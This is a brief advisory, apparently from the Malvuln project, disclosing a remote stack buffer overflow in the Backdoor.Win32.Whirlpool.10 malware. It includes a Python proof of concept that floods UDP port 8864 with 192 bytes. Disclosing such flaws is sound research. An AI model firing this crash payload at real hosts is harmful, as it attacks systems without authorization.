Backdoor.Win32.Whirlpool.10 Remote Stack Buffer Overflow

Backdoor.Win32.Whirlpool.10 Remote Stack Buffer Overflow

Backdoor.Win32.Whirlpool.10 malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=8864

def doit():
    s=socket(AF_INET, SOCK_DGRAM) 
    s.connect((MALWARE_HOST, PORT))

    PACKET="A"*192

    s.send(PACKET)
    s.close()

    print("Backdoor.Win32.Whirlpool.10.b / Remote Buffer Overflow")
    print("MD5: bf0682b674ef23cf8ba0deeaf546f422")
    print("By Malvuln");

if __name__=="__main__":
    doit()